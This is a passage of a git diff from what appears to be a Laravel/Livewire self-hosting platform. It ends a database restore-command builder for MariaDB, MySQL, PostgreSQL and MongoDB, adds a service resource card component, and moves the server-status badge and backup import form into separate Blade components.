+                    $restoreCommand .= " && (gunzip -cf {$tmpPath} 2>/dev/null || cat {$tmpPath}) | mariadb -u root -p\$MARIADB_ROOT_PASSWORD \${MARIADB_DATABASE:-default}";
+                } else {
+                    $restoreCommand .= " < {$tmpPath}";
+                }
+                break;
+            case StandaloneMysql::class:
+            case 'mysql':
+                $restoreCommand = $this->mysqlRestoreCommand;
+                if ($this->dumpAll) {
+                    $restoreCommand .= " && (gunzip -cf {$tmpPath} 2>/dev/null || cat {$tmpPath}) | mysql -u root -p\$MYSQL_ROOT_PASSWORD \${MYSQL_DATABASE:-default}";
+                } else {
+                    $restoreCommand .= " < {$tmpPath}";
+                }
+                break;
+            case StandalonePostgresql::class:
+            case 'postgresql':
+                $restoreCommand = $this->postgresqlRestoreCommand;
+                if ($this->dumpAll) {
+                    $restoreCommand .= " && (gunzip -cf {$tmpPath} 2>/dev/null || cat {$tmpPath}) | psql -U \${POSTGRES_USER} -d \${POSTGRES_DB:-\${POSTGRES_USER:-postgres}}";
+                } else {
+                    $restoreCommand .= " {$tmpPath}";
+                }
+                break;
+            case StandaloneMongodb::class:
+            case 'mongodb':
+                $restoreCommand = $this->mongodbRestoreCommand;
+                if ($this->dumpAll === false) {
+                    $restoreCommand .= "{$tmpPath}";
+                }
+                break;
+            default:
+                $restoreCommand = '';
+        }
+
+        return $restoreCommand;
+    }
+}
diff --git a/app/Livewire/Project/Service/ResourceCard.php b/app/Livewire/Project/Service/ResourceCard.php
new file mode 100644
index 000000000..fd27f60c3
--- /dev/null
+++ b/app/Livewire/Project/Service/ResourceCard.php
@@ -0,0 +1,66 @@
+<?php
+
+namespace App\Livewire\Project\Service;
+
+use App\Models\Service;
+use App\Models\ServiceApplication;
+use App\Models\ServiceDatabase;
+use Illuminate\Contracts\View\View;
+use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
+use Illuminate\Support\Facades\Auth;
+use Livewire\Component;
+
+class ResourceCard extends Component
+{
+    use AuthorizesRequests;
+
+    public Service $service;
+
+    public ServiceApplication|ServiceDatabase $resource;
+
+    public array $parameters = [];
+
+    public function getListeners(): array
+    {
+        $user = Auth::user();
+        if (! $user) {
+            return [];
+        }
+
+        $team = $user->currentTeam();
+        if (! $team) {
+            return [];
+        }
+
+        return [
+            "echo-private:team.{$team->id},ServiceChecked" => 'refreshResource',
+        ];
+    }
+
+    public function refreshResource(): void
+    {
+        $this->resource->refresh();
+    }
+
+    public function restart(): void
+    {
+        try {
+            $this->authorize('update', $this->service);
+            $this->resource->restart();
+            $message = $this->resource instanceof ServiceApplication
+                ? 'Service application restarted successfully.'
+                : 'Service database restarted successfully.';
+            $this->dispatch('success', $message);
+        } catch (\Throwable $e) {
+            handleError($e, $this);
+        }
+    }
+
+    public function render(): View
+    {
+        return view('livewire.project.service.resource-card', [
+            'isApplication' => $this->resource instanceof ServiceApplication,
+            'isDatabase' => $this->resource instanceof ServiceDatabase,
+        ]);
+    }
+}
diff --git a/resources/views/livewire/project/application/configuration.blade.php b/resources/views/livewire/project/application/configuration.blade.php
index 848c46ff7..6986cef05 100644
--- a/resources/views/livewire/project/application/configuration.blade.php
+++ b/resources/views/livewire/project/application/configuration.blade.php
@@ -27,21 +27,7 @@
             @endif
             <a class="sub-menu-item flex items-center gap-2" {{ wireNavigate() }} wire:current.exact="menu-item-active"
                 href="{{ route('project.application.servers', ['project_uuid' => $project->uuid, 'environment_uuid' => $environment->uuid, 'application_uuid' => $application->uuid]) }}"><span class="menu-item-label">Servers</span>
-                @if ($application->server_status == false)
-                    <span title="One or more servers are unreachable or misconfigured.">
-                        <svg class="w-4 h-4 text-error" viewBox="0 0 256 256" xmlns="http://www.w3.org/2000/svg">
-                            <path fill="currentColor"
-                                d="M240.26 186.1L152.81 34.23a28.74 28.74 0 0 0-49.62 0L15.74 186.1a27.45 27.45 0 0 0 0 27.71A28.31 28.31 0 0 0 40.55 228h174.9a28.31 28.31 0 0 0 24.79-14.19a27.45 27.45 0 0 0 .02-27.71m-20.8 15.7a4.46 4.46 0 0 1-4 2.2H40.55a4.46 4.46 0 0 1-4-2.2a3.56 3.56 0 0 1 0-3.73L124 46.2a4.77 4.77 0 0 1 8 0l87.44 151.87a3.56 3.56 0 0 1 .02 3.73M116 136v-32a12 12 0 0 1 24 0v32a12 12 0 0 1-24 0m28 40a16 16 0 1 1-16-16a16 16 0 0 1 16 16" />
-                        </svg>
-                    </span>
-                @elseif ($application->additional_servers()->exists() && str($application->status)->contains('degraded'))
-                    <span title="Application is in degraded state across multiple servers.">
-                        <svg class="w-4 h-4 text-error" viewBox="0 0 256 256" xmlns="http://www.w3.org/2000/svg">
-                            <path fill="currentColor"
-                                d="M240.26 186.1L152.81 34.23a28.74 28.74 0 0 0-49.62 0L15.74 186.1a27.45 27.45 0 0 0 0 27.71A28.31 28.31 0 0 0 40.55 228h174.9a28.31 28.31 0 0 0 24.79-14.19a27.45 27.45 0 0 0 .02-27.71m-20.8 15.7a4.46 4.46 0 0 1-4 2.2H40.55a4.46 4.46 0 0 1-4-2.2a3.56 3.56 0 0 1 0-3.73L124 46.2a4.77 4.77 0 0 1 8 0l87.44 151.87a3.56 3.56 0 0 1 .02 3.73M116 136v-32a12 12 0 0 1 24 0v32a12 12 0 0 1-24 0m28 40a16 16 0 1 1-16-16a16 16 0 0 1 16 16" />
-                        </svg>
-                    </span>
-                @endif
+                <livewire:project.application.server-status-badge :application="$application" />
             </a>
             <a @class(['sub-menu-item', 'menu-item-active' => str($currentRoute)->startsWith('project.application.scheduled-tasks')]) {{ wireNavigate() }}
                 href="{{ route('project.application.scheduled-tasks.show', ['project_uuid' => $project->uuid, 'environment_uuid' => $environment->uuid, 'application_uuid' => $application->uuid]) }}"><span class="menu-item-label">Scheduled Tasks</span></a>
diff --git a/resources/views/livewire/project/application/server-status-badge.blade.php b/resources/views/livewire/project/application/server-status-badge.blade.php
new file mode 100644
index 000000000..3413b3671
--- /dev/null
+++ b/resources/views/livewire/project/application/server-status-badge.blade.php
@@ -0,0 +1,17 @@
+<span>
+    @if ($application->server_status == false)
+        <span title="One or more servers are unreachable or misconfigured.">
+            <svg class="w-4 h-4 text-error" viewBox="0 0 256 256" xmlns="http://www.w3.org/2000/svg">
+                <path fill="currentColor"
+                    d="M240.26 186.1L152.81 34.23a28.74 28.74 0 0 0-49.62 0L15.74 186.1a27.45 27.45 0 0 0 0 27.71A28.31 28.31 0 0 0 40.55 228h174.9a28.31 28.31 0 0 0 24.79-14.19a27.45 27.45 0 0 0 .02-27.71m-20.8 15.7a4.46 4.46 0 0 1-4 2.2H40.55a4.46 4.46 0 0 1-4-2.2a3.56 3.56 0 0 1 0-3.73L124 46.2a4.77 4.77 0 0 1 8 0l87.44 151.87a3.56 3.56 0 0 1 .02 3.73M116 136v-32a12 12 0 0 1 24 0v32a12 12 0 0 1-24 0m28 40a16 16 0 1 1-16-16a16 16 0 0 1 16 16" />
+            </svg>
+        </span>
+    @elseif ($application->additional_servers()->exists() && str($application->status)->contains('degraded'))
+        <span title="Application is in degraded state across multiple servers.">
+            <svg class="w-4 h-4 text-error" viewBox="0 0 256 256" xmlns="http://www.w3.org/2000/svg">
+                <path fill="currentColor"
+                    d="M240.26 186.1L152.81 34.23a28.74 28.74 0 0 0-49.62 0L15.74 186.1a27.45 27.45 0 0 0 0 27.71A28.31 28.31 0 0 0 40.55 228h174.9a28.31 28.31 0 0 0 24.79-14.19a27.45 27.45 0 0 0 .02-27.71m-20.8 15.7a4.46 4.46 0 0 1-4 2.2H40.55a4.46 4.46 0 0 1-4-2.2a3.56 3.56 0 0 1 0-3.73L124 46.2a4.77 4.77 0 0 1 8 0l87.44 151.87a3.56 3.56 0 0 1 .02 3.73M116 136v-32a12 12 0 0 1 24 0v32a12 12 0 0 1-24 0m28 40a16 16 0 1 1-16-16a16 16 0 0 1 16 16" />
+            </svg>
+        </span>
+    @endif
+</span>
diff --git a/resources/views/livewire/project/database/import-form.blade.php b/resources/views/livewire/project/database/import-form.blade.php
new file mode 100644
index 000000000..15306f9df
--- /dev/null
+++ b/resources/views/livewire/project/database/import-form.blade.php
@@ -0,0 +1,228 @@
+<div x-data="{
+    error: $wire.entangle('error'),
+    filesize: $wire.entangle('filesize'),
+    filename: $wire.entangle('filename'),
+    isUploading: $wire.entangle('isUploading'),
+    progress: $wire.entangle('progress'),
+    s3FileSize: $wire.entangle('s3FileSize'),
+    s3StorageId: $wire.entangle('s3StorageId'),
+    s3Path: $wire.entangle('s3Path'),
+    restoreType: null
+}">
+    <script type="text/javascript" src="{{ URL::asset('js/dropzone.js') }}"></script>
+    @script
+    <script data-navigate-once>
+        Dropzone.options.myDropzone = {
+            chunking: true,
+            method: "POST",
+            maxFilesize: 1000000000,
+            chunkSize: 10000000,
+            createImageThumbnails: false,
+            disablePreviews: true,
+            parallelChunkUploads: false,
+            init: function () {
+                let button = this.element.querySelector('button');
+                button.innerText = 'Select or drop a backup file here.'
+                this.on('sending', function (file, xhr, formData) {
+                    const token = document.querySelector('meta[name="csrf-token"]').getAttribute('content');
+                    formData.append("_token", token);
+                });
+                this.on("addedfile", file => {
+                    $wire.isUploading = true;
+                    $wire.customLocation = '';
+                });
+                this.on('uploadprogress', function (file, progress, bytesSent) {
+                    $wire.progress = progress;
+                });
+                this.on('complete', function (file) {
+                    $wire.filename = file.name;
+                    $wire.filesize = Number(file.size / 1024 / 1024).toFixed(2) + ' MB';
+                    $wire.isUploading = false;
+                });
+                this.on('error', function (file, message) {
+                    $wire.error = true;
+                    $wire.$dispatch('error', message.error)
+                });
+            }
+        };
+    </script>
+    @endscript
+        <div class="pt-2 rounded-sm alert-error">
+            <svg xmlns="http://www.w3.org/2000/svg" class="w-6 h-6 stroke-current shrink-0" fill="none" viewBox="0 0 24 24">
+                <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
+                    d="M12 9v2m0 4h.01m-6.938 4h13.856c1.54 0 2.502-1.667 1.732-3L13.732 4c-.77-1.333-2.694-1.333-3.464 0L3.34 16c-.77 1.333.192 3 1.732 3z" />
+            </svg>
+            <span>This is a destructive action, existing data will be replaced!</span>
+        </div>
+        {{-- Restore Command Configuration --}}
+            @if ($resourceDbType === 'standalone-postgresql')
+                @if ($dumpAll)
+                    <x-forms.textarea rows="6" readonly label="Custom Import Command"
+                        wire:model='restoreCommandText'></x-forms.textarea>
+                @else
+                    <x-forms.input label="Custom Import Command" wire:model='postgresqlRestoreCommand'></x-forms.input>
+                    <div class="flex flex-col gap-1 pt-1">
+                        <span class="text-xs">You can add "--clean" to drop objects before creating them, avoiding
+                            conflicts.</span>
+                        <span class="text-xs">You can add "--verbose" to log more things.</span>
+                    </div>
+                @endif
+                <div class="w-64 pt-2">
+                    <x-forms.checkbox label="Backup includes all databases" wire:model.live='dumpAll'></x-forms.checkbox>
+                </div>
+            @elseif ($resourceDbType === 'standalone-mysql')
+                @if ($dumpAll)
+                    <x-forms.textarea rows="14" readonly label="Custom Import Command"
+                        wire:model='restoreCommandText'></x-forms.textarea>
+                @else
+                    <x-forms.input label="Custom Import Command" wire:model='mysqlRestoreCommand'></x-forms.input>
+                @endif
+                <div class="w-64 pt-2">
+                    <x-forms.checkbox label="Backup includes all databases" wire:model.live='dumpAll'></x-forms.checkbox>
+                </div>
+            @elseif ($resourceDbType === 'standalone-mariadb')
+                @if ($dumpAll)
+                    <x-forms.textarea rows="14" readonly label="Custom Import Command"
+                        wire:model='restoreCommandText'></x-forms.textarea>
+                @else
+                    <x-forms.input label="Custom Import Command" wire:model='mariadbRestoreCommand'></x-forms.input>
+                @endif
+                <div class="w-64 pt-2">
+                    <x-forms.checkbox label="Backup includes all databases" wire:model.live='dumpAll'></x-forms.checkbox>
+                </div>
+            @endif
+
+            {{-- Restore Type Selection Boxes --}}
+            <h3 class="pt-6">Choose Restore Method</h3>
+            <div class="flex gap-4 pt-2">
+                <div @click="restoreType = 'file'"
+                     class="flex-1 p-6 border-2 rounded-sm cursor-pointer transition-all"
+                     :class="restoreType === 'file' ? 'border-warning bg-warning/10' : 'border-neutral-200 dark:border-neutral-800 hover:border-warning/50'">
+                    <div class="flex flex-col gap-2">
+                        <svg xmlns="http://www.w3.org/2000/svg" class="w-8 h-8" fill="none" viewBox="0 0 24 24" stroke="currentColor">
+                            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M7 16a4 4 0 01-.88-7.903A5 5 0 1115.9 6L16 6a5 5 0 011 9.9M15 13l-3-3m0 0l-3 3m3-3v12" />
+                        </svg>
+                        <h4 class="text-lg font-bold">Restore from File</h4>
+                        <p class="text-sm text-neutral-600 dark:text-neutral-400">Upload a backup file or specify a file path on the server</p>
+                    </div>
+                </div>
+
+                @if (count($availableS3Storages) > 0)
+                    <div @click="restoreType = 's3'"
+                         class="flex-1 p-6 border-2 rounded-sm cursor-pointer transition-all"
+                         :class="restoreType === 's3' ? 'border-warning bg-warning/10' : 'border-neutral-200 dark:border-neutral-800 hover:border-warning/50'">
+                        <div class="flex flex-col gap-2">
+                            <svg xmlns="http://www.w3.org/2000/svg" class="w-8 h-8" fill="none" viewBox="0 0 24 24" stroke="currentColor">
+                                <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M3 15a4 4 0 004 4h9a5 5 0 10-.1-9.999 5.002 5.002 0 10-9.78 2.096A4.001 4.001 0 003 15z" />
+                            </svg>
+                            <h4 class="text-lg font-bold">Restore from S3</h4>
+                            <p class="text-sm text-neutral-600 dark:text-neutral-400">Download and restore a backup from S3 storage</p>
+                        </div>
+                    </div>
+                @endif
+            </div>
+
+            {{-- File Restore Section --}}
+            @can('update', $this->resource)
+                <div x-show="restoreType === 'file'" class="pt-6">
+                    <h3>Backup File</h3>
+                    <form class="flex gap-2 items-end pt-2">
+                        <x-forms.input label="Location of the backup file on the server" placeholder="e.g. /home/user/backup.sql.gz"
+                            wire:model='customLocation' x-model="$wire.customLocation"></x-forms.input>
+                        <x-forms.button class="w-full" wire:click='checkFile' x-bind:disabled="!$wire.customLocation">Check File</x-forms.button>
+                    </form>
+                    <div class="pt-2 text-center text-xl font-bold">
+                        Or
+                    </div>
+                    <form action="/upload/backup/{{ $resourceUuid }}" class="dropzone" id="my-dropzone" wire:ignore>
+                        @csrf
+                    </form>
+                    <div x-show="isUploading">
+                        <progress max="100" x-bind:value="progress" class="progress progress-warning"></progress>
+                    </div>
+
+                    <div x-show="filename && !error" class="pt-6">
+                        <h3>File Information</h3>
+                        <div class="pt-2">Location: <span x-text="filename ?? 'N/A'"></span><span x-show="filesize" x-text="' / ' + filesize"></span></div>
+                        <div class="pt-2">
+                            <x-modal-confirmation title="Restore Database from File?" buttonTitle="Restore from File"
+                                submitAction="runImport" isErrorButton>
+                                <x-slot:button-title>
+                                    Restore Database from File
+                                </x-slot:button-title>
+                                This will perform the following actions:
+                                <ul class="list-disc list-inside pt-2">
+                                    <li>Copy backup file to database container</li>
+                                    <li>Execute restore command</li>
+                                </ul>
+                                <div class="pt-2 font-bold text-error">WARNING: This will REPLACE all existing data!</div>
+                            </x-modal-confirmation>
+                        </div>
+                    </div>
+                </div>
+            @endcan
+
+            {{-- S3 Restore Section --}}
+            @if (count($availableS3Storages) > 0)
+                @can('update', $this->resource)
+                    <div x-show="restoreType === 's3'" class="pt-6">
+                        <h3>Restore from S3</h3>
+                        <div class="flex flex-col gap-2 pt-2">
+                            <x-forms.select label="S3 Storage" wire:model.live="s3StorageId">
+                                <option value="">Select S3 Storage</option>
+                                @foreach ($availableS3Storages as $storage)
+                                    <option value="{{ $storage['id'] }}">{{ $storage['name'] }}
+                                        @if ($storage['description'])
+                                            - {{ $storage['description'] }}
+                                        @endif
+                                    </option>
+                                @endforeach
+                            </x-forms.select>
+
+                            <x-forms.input label="S3 File Path (within bucket)"
+                                helper="Path to the backup file in your S3 bucket, e.g., /backups/database-2025-01-15.gz"
+                                placeholder="/backups/database-backup.gz" wire:model.blur='s3Path'
+                                wire:keydown.enter='checkS3File'></x-forms.input>
+
+                            <div class="flex gap-2">
+                                <x-forms.button class="w-full" wire:click='checkS3File' x-bind:disabled="!s3StorageId || !s3Path">
+                                    Check File
+                                </x-forms.button>
+                            </div>
+
+                            @if ($s3FileSize)
+                                <div class="pt-6">
+                                    <h3>File Information</h3>
+                                    <div class="pt-2">Location: {{ $s3Path }} {{ formatBytes($s3FileSize ?? 0) }}</div>
+                                    <div class="pt-2">
+                                        <x-modal-confirmation title="Restore Database from S3?" buttonTitle="Restore from S3"
+                                            submitAction="restoreFromS3" isErrorButton>
+                                            <x-slot:button-title>
+                                                Restore Database from S3
+                                            </x-slot:button-title>
+                                            This will perform the following actions:
+                                            <ul class="list-disc list-inside pt-2">
+                                                <li>Download backup from S3 storage</li>
+                                                <li>Copy file into database container</li>
+                                                <li>Execute restore command</li>
+                                            </ul>
+                                            <div class="pt-2 font-bold text-error">WARNING: This will REPLACE all existing data!</div>
+                                        </x-modal-confirmation>
+                                    </div>
+                                </div>
+                            @endif
+                        </div>
+                    </div>
+                @endcan
+            @endif
+
+            {{-- Slide-over for activity monitor (all restore operations) --}}
+            <x-slide-over @databaserestore.window="slideOverOpen = true" closeWithX fullScreen>
+                <x-slot:title>Database Restore Output</x-slot:title>
+                <x-slot:content>
+                    <div wire:ignore>
+                        <livewire:activity-monitor wire:key="database-restore-{{ $resourceUuid }}" header="Logs" fullHeight />
+                    </div>
+                </x-slot:content>
+            </x-slide-over>
+</div>
\ No newline at end of file
diff --git a/resources/views/livewire/project/database/import.blade.php b/resources/views/livewire/project/database/import.blade.php
index 666abb3b3..75de25f71 100644
--- a/resources/views/livewire/project/database/import.blade.php
+++ b/resources/views/livewire/project/database/import.blade.php
@@ -1,237 +1,10 @@
-<div x-data="{
-    error: $wire.entangle('error'),
-    filesize: $wire.entangle('filesize'),
-    filename: $wire.entangle('filename'),
-    isUploading: $wire.entangle('isUploading'),
-    progress: $wire.entangle('progress'),
-    s3FileSize: $wire.entangle('s3FileSize'),
-    s3StorageId: $wire.entangle('s3StorageId'),
-    s3Path: $wire.entangle('s3Path'),
-    restoreType: null
-}">
-    <script type="text/javascript" src="{{ URL::asset('js/dropzone.js') }}"></script>
-    @script
-    <script data-navigate-once>
-        Dropzone.options.myDropzone = {
-            chunking: true,
-            method: "POST",
-            maxFilesize: 1000000000,
-            chunkSize: 10000000,
-            createImageThumbnails: false,
-            disablePreviews: true,
-            parallelChunkUploads: false,
-            init: function () {
-                let button = this.element.querySelector('button');
-                button.innerText = 'Select or drop a backup file here.'
-                this.on('sending', function (file, xhr, formData) {
-                    const token = document.querySelector('meta[name="csrf-token"]').getAttribute('content');
-                    formData.append("_token", token);
-                });
-                this.on("addedfile", file => {
-                    $wire.isUploading = true;
-                    $wire.customLocation = '';
-                });
-                this.on('uploadprogress', function (file, progress, bytesSent) {
-                    $wire.progress = progress;
-                });
-                this.on('complete', function (file) {
-                    $wire.filename = file.name;
-                    $wire.filesize = Number(file.size / 1024 / 1024).toFixed(2) + ' MB';
-                    $wire.isUploading = false;
-                });
-                this.on('error', function (file, message) {
-                    $wire.error = true;
-                    $wire.$dispatch('error', message.error)
-                });
-            }
-        };
-    </script>
-    @endscript
+<div>
     <h2>Import Backup</h2>
     @if ($unsupported)
         <div>Database restore is not supported.</div>
+    @elseif (str($resourceStatus)->startsWith('running'))
+        <livewire:project.database.import-form wire:key="database-import-form-{{ $resourceUuid }}" />
     @else
-        <div class="pt-2 rounded-sm alert-error">
-            <svg xmlns="http://www.w3.org/2000/svg" class="w-6 h-6 stroke-current shrink-0" fill="none" viewBox="0 0 24 24">
-                <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
-                    d="M12 9v2m0 4h.01m-6.938 4h13.856c1.54 0 2.502-1.667 1.732-3L13.732 4c-.77-1.333-2.694-1.333-3.464 0L3.34 16c-.77 1.333.192 3 1.732 3z" />
-            </svg>
-            <span>This is a destructive action, existing data will be replaced!</span>
-        </div>
-        @if (str($resourceStatus)->startsWith('running'))
-            {{-- Restore Command Configuration --}}
-            @if ($resourceDbType === 'standalone-postgresql')
-                @if ($dumpAll)
-                    <x-forms.textarea rows="6" readonly label="Custom Import Command"
-                        wire:model='restoreCommandText'></x-forms.textarea>
-                @else
-                    <x-forms.input label="Custom Import Command" wire:model='postgresqlRestoreCommand'></x-forms.input>
-                    <div class="flex flex-col gap-1 pt-1">
-                        <span class="text-xs">You can add "--clean" to drop objects before creating them, avoiding
-                            conflicts.</span>
-                        <span class="text-xs">You can add "--verbose" to log more things.</span>
-                    </div>
-                @endif
-                <div class="w-64 pt-2">
-                    <x-forms.checkbox label="Backup includes all databases" wire:model.live='dumpAll'></x-forms.checkbox>
-                </div>
-            @elseif ($resourceDbType === 'standalone-mysql')
-                @if ($dumpAll)
-                    <x-forms.textarea rows="14" readonly label="Custom Import Command"
-                        wire:model='restoreCommandText'></x-forms.textarea>
-                @else
-                    <x-forms.input label="Custom Import Command" wire:model='mysqlRestoreCommand'></x-forms.input>
-                @endif
-                <div class="w-64 pt-2">
-                    <x-forms.checkbox label="Backup includes all databases" wire:model.live='dumpAll'></x-forms.checkbox>
-                </div>
-            @elseif ($resourceDbType === 'standalone-mariadb')
-                @if ($dumpAll)
-                    <x-forms.textarea rows="14" readonly label="Custom Import Command"
-                        wire:model='restoreCommandText'></x-forms.textarea>
-                @else
-                    <x-forms.input label="Custom Import Command" wire:model='mariadbRestoreCommand'></x-forms.input>
-                @endif
-                <div class="w-64 pt-2">
-                    <x-forms.checkbox label="Backup includes all databases" wire:model.live='dumpAll'></x-forms.checkbox>
-                </div>
-            @endif
-
-            {{-- Restore Type Selection Boxes --}}
-            <h3 class="pt-6">Choose Restore Method</h3>
-            <div class="flex gap-4 pt-2">
-                <div @click="restoreType = 'file'"
-                     class="flex-1 p-6 border-2 rounded-sm cursor-pointer transition-all"
-                     :class="restoreType === 'file' ? 'border-warning bg-warning/10' : 'border-neutral-200 dark:border-neutral-800 hover:border-warning/50'">
-                    <div class="flex flex-col gap-2">
-                        <svg xmlns="http://www.w3.org/2000/svg" class="w-8 h-8" fill="none" viewBox="0 0 24 24" stroke="currentColor">
-                            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M7 16a4 4 0 01-.88-7.903A5 5 0 1115.9 6L16 6a5 5 0 011 9.9M15 13l-3-3m0 0l-3 3m3-3v12" />
-                        </svg>
-                        <h4 class="text-lg font-bold">Restore from File</h4>
-                        <p class="text-sm text-neutral-600 dark:text-neutral-400">Upload a backup file or specify a file path on the server</p>
-                    </div>
-                </div>
-
-                @if (count($availableS3Storages) > 0)
-                    <div @click="restoreType = 's3'"
-                         class="flex-1 p-6 border-2 rounded-sm cursor-pointer transition-all"
-                         :class="restoreType === 's3' ? 'border-warning bg-warning/10' : 'border-neutral-200 dark:border-neutral-800 hover:border-warning/50'">
-                        <div class="flex flex-col gap-2">
-                            <svg xmlns="http://www.w3.org/2000/svg" class="w-8 h-8" fill="none" viewBox="0 0 24 24" stroke="currentColor">
-                                <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M3 15a4 4 0 004 4h9a5 5 0 10-.1-9.999 5.002 5.002 0 10-9.78 2.096A4.001 4.001 0 003 15z" />
-                            </svg>
-                            <h4 class="text-lg font-bold">Restore from S3</h4>
-                            <p class="text-sm text-neutral-600 dark:text-neutral-400">Download and restore a backup from S3 storage</p>
-                        </div>
-                    </div>
-                @endif
-            </div>
-
-            {{-- File Restore Section --}}
-            @can('update', $this->resource)
-                <div x-show="restoreType === 'file'" class="pt-6">
-                    <h3>Backup File</h3>
-                    <form class="flex gap-2 items-end pt-2">
-                        <x-forms.input label="Location of the backup file on the server" placeholder="e.g. /home/user/backup.sql.gz"
-                            wire:model='customLocation' x-model="$wire.customLocation"></x-forms.input>
-                        <x-forms.button class="w-full" wire:click='checkFile' x-bind:disabled="!$wire.customLocation">Check File</x-forms.button>
-                    </form>
-                    <div class="pt-2 text-center text-xl font-bold">
-                        Or
-                    </div>
-                    <form action="/upload/backup/{{ $resourceUuid }}" class="dropzone" id="my-dropzone" wire:ignore>
-                        @csrf
-                    </form>
-                    <div x-show="isUploading">
-                        <progress max="100" x-bind:value="progress" class="progress progress-warning"></progress>
-                    </div>
-
-                    <div x-show="filename && !error" class="pt-6">
-                        <h3>File Information</h3>
-                        <div class="pt-2">Location: <span x-text="filename ?? 'N/A'"></span><span x-show="filesize" x-text="' / ' + filesize"></span></div>
-                        <div class="pt-2">
-                            <x-modal-confirmation title="Restore Database from File?" buttonTitle="Restore from File"
-                                submitAction="runImport" isErrorButton>
-                                <x-slot:button-title>
-                                    Restore Database from File
-                                </x-slot:button-title>
-                                This will perform the following actions:
-                                <ul class="list-disc list-inside pt-2">
-                                    <li>Copy backup file to database container</li>
-                                    <li>Execute restore command</li>
-                                </ul>
-                                <div class="pt-2 font-bold text-error">WARNING: This will REPLACE all existing data!</div>
-                            </x-modal-confirmation>
-                        </div>
-                    </div>
-                </div>
-            @endcan
-
-            {{-- S3 Restore Section --}}
-            @if (count($availableS3Storages) > 0)
-                @can('update', $this->resource)
-                    <div x-show="restoreType === 's3'" class="pt-6">
-                        <h3>Restore from S3</h3>
-                        <div class="flex flex-col gap-2 pt-2">
-                            <x-forms.select label="S3 Storage" wire:model.live="s3StorageId">
-                                <option value="">Select S3 Storage</option>
-                                @foreach ($availableS3Storages as $storage)
-                                    <option value="{{ $storage['id'] }}">{{ $storage['name'] }}
-                                        @if ($storage['description'])
-                                            - {{ $storage['description'] }}
-                                        @endif
-                                    </option>
-                                @endforeach
-                            </x-forms.select>
-
-                            <x-forms.input label="S3 File Path (within bucket)"
-                                helper="Path to the backup file in your S3 bucket, e.g., /backups/database-2025-01-15.gz"
-                                placeholder="/backups/database-backup.gz" wire:model.blur='s3Path'
-                                wire:keydown.enter='checkS3File'></x-forms.input>
-
-                            <div class="flex gap-2">
-                                <x-forms.button class="w-full" wire:click='checkS3File' x-bind:disabled="!s3StorageId || !s3Path">
-                                    Check File
-                                </x-forms.button>
-                            </div>
-
-                            @if ($s3FileSize)
-                                <div class="pt-6">
-                                    <h3>File Information</h3>
-                                    <div class="pt-2">Location: {{ $s3Path }} {{ formatBytes($s3FileSize ?? 0) }}</div>
-                                    <div class="pt-2">
-                                        <x-modal-confirmation title="Restore Database from S3?" buttonTitle="Restore from S3"
-                                            submitAction="restoreFromS3" isErrorButton>
-                                            <x-slot:button-title>
-                                                Restore Database from S3
-                                            </x-slot:button-title>
-                                            This will perform the following actions:
-                                            <ul class="list-disc list-inside pt-2">
-                                                <li>Download backup from S3 storage</li>
-                                                <li>Copy file into database container</li>
-                                                <li>Execute restore command</li>
-                                            </ul>
-                                            <div class="pt-2 font-bold text-error">WARNING: This will REPLACE all existing data!</div>
-                                        </x-modal-confirmation>
-                                    </div>
-                                </div>
-                            @endif
-                        </div>
-                    </div>
-                @endcan
-            @endif
-
-            {{-- Slide-over for activity monitor (all restore operations) --}}
-            <x-slide-over @databaserestore.window="slideOverOpen = true" closeWithX fullScreen>
-                <x-slot:title>Database Restore Output</x-slot:title>
-                <x-slot:content>
-                    <div wire:ignore>
-                        <livewire:activity-monitor wire:key="database-restore-{{ $resourceUuid }}" header="Logs" fullHeight />
-                    </div>
-                </x-slot:content>
-            </x-slide-over>
-        @else
-            <div>Database must be running to restore a backup.</div>
-        @endif
+        <div>Database must be running to restore a backup.</div>
     @endif
-</div>
\ No newline at end of file
+</div>
diff --git a/resources/views/livewire/project/service/configuration.blade.php b/resources/views/livewire/project/service/configuration.blade.php
index ffe80b595..35b2ffd20 100644
--- a/resources/views/livewire/project/service/configuration.blade.php
+++ b/resources/views/livewire/project/service/configuration.blade.php
@@ -43,134 +43,12 @@
                     @endif
 
                     @foreach ($applications as $application)
-                        <div @class([
-                            'border-l border-dashed border-red-500' => str(
-                                $application->status)->contains(['exited']),
-                            'border-l border-dashed border-success' => str(
-                                $application->status)->contains(['running']),
-                            'border-l border-dashed border-warning' => str(
-                                $application->status)->contains(['starting']),
-                            'flex gap-2 box-without-bg-without-border dark:bg-coolgray-100 bg-white dark:hover:text-neutral-300 group',
-                        ])>
-                            <div class="flex flex-row w-full">
-                                <div class="flex flex-col flex-1">
-                                    <div class="pb-2">
-                                        @if ($application->human_name)
-                                            {{ Str::headline($application->human_name) }}
-                                        @else
-                                            {{ Str::headline($application->name) }}
-                                        @endif
-                                        <span class="text-xs">({{ $application->image }})</span>
-                                    </div>
-                                    @if ($application->configuration_required)
-                                        <span class="text-xs text-error">(configuration required)</span>
-                                    @endif
-                                    @if ($application->description)
-                                        <span class="text-xs">{{ Str::limit($application->description, 60) }}</span>
-                                    @endif
-                                    @if ($application->fqdn)
-                                        <span class="flex gap-1 text-xs">{{ Str::limit($application->fqdn, 60) }}
-                                            @can('update', $service)
-                                                <x-modal-input title="Edit Domains" :closeOutside="false">
-                                                    <x-slot:content>
-                                                        <span class="cursor-pointer">
-                                                            <svg xmlns="http://www.w3.org/2000/svg"
-                                                                class="w-4 h-4 dark:text-warning text-coollabs"
-                                                                viewBox="0 0 24 24">
-                                                                <g fill="none" stroke="currentColor"
-                                                                    stroke-linecap="round" stroke-linejoin="round"
-                                                                    stroke-width="2">
-                                                                    <path
-                                                                        d="m12 15l8.385-8.415a2.1 2.1 0 0 0-2.97-2.97L9 12v3h3zm4-10l3 3" />
-                                                                    <path d="M9 7.07A7 7 0 0 0 10 21a7 7 0 0 0 6.929-6" />
-                                                                </g>
-                                                            </svg>
-
-                                                        </span>
-                                                    </x-slot:content>
-                                                    <livewire:project.service.edit-domain
-                                                        applicationId="{{ $application->id }}"
-                                                        wire:key="edit-domain-{{ $application->id }}" />
-                                                </x-modal-input>
-                                            @endcan
-                                        </span>
-                                    @endif
